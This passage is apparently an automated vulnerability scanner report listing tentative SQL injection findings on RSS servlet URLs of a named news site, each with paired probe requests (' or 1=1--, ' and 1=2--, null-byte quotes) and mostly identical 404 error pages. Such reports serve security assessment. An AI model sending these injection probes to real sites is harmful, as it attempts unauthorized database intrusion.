Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200902.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 11517556'%20or%201%3d1--%20 and 11517556'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet11517556'%20or%201%3d1--%20/568/200902.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi/rss/CustomRssServlet11517556'%20or%201%3d2--%20/568/200902.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:44 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.63. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200906.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200906.xml

Issue detail

Request 1

GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200906.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:41 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200906.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.64. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200907.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200907.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 31633381'%20or%201%3d1--%20 and 31633381'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi31633381'%20or%201%3d1--%20/rss/CustomRssServlet/568/200907.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:21:10 GMT
Date: Tue, 07 Dec 2010 23:21:10 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi31633381'%20or%201%3d2--%20/rss/CustomRssServlet/568/200907.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.65. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200907.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200907.xml

Issue detail

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200907.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:20 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200907.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.66. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200908.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200908.xml

Issue detail

Remediation detail

Request 1

GET /mngi/rss/CustomRssServlet/568%00'/200908.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:21:39 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568%00''/200908.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.67. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200909.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200909.xml

Issue detail

Remediation detail

Request 1

GET /mngi/rss/CustomRssServlet/568%00'/200909.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:22:07 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568%00''/200909.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.68. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200910.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200910.xml

Issue detail

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200910.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:06 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200910.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:21:06 GMT
Date: Tue, 07 Dec 2010 23:21:06 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

1.69. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200911.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200911.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 16915327'%20or%201%3d1--%20 and 16915327'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi16915327'%20or%201%3d1--%20/rss/CustomRssServlet/568/200911.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:06 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi16915327'%20or%201%3d2--%20/rss/CustomRssServlet/568/200911.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:22:06 GMT
Date: Tue, 07 Dec 2010 23:22:06 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

1.70. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200911.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200911.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 18682428'%20or%201%3d1--%20 and 18682428'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet18682428'%20or%201%3d1--%20/568/200911.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:13 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet18682428'%20or%201%3d2--%20/568/200911.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.71. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200912.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200912.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 11169924'%20or%201%3d1--%20 and 11169924'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet11169924'%20or%201%3d1--%20/568/200912.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:22 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet11169924'%20or%201%3d2--%20/568/200912.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.72. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200913.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200913.xml

Issue detail

Remediation detail

Request 1

GET /mngi/rss/CustomRssServlet/568%00'/200913.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:21:53 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568%00''/200913.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.73. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200914.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200914.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 64439849'%20or%201%3d1--%20 and 64439849'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56864439849'%20or%201%3d1--%20/200914.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:35 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56864439849'%20or%201%3d2--%20/200914.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.74. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200915.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200915.xml

Issue detail

Request 1

GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200915.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200915.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:19 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
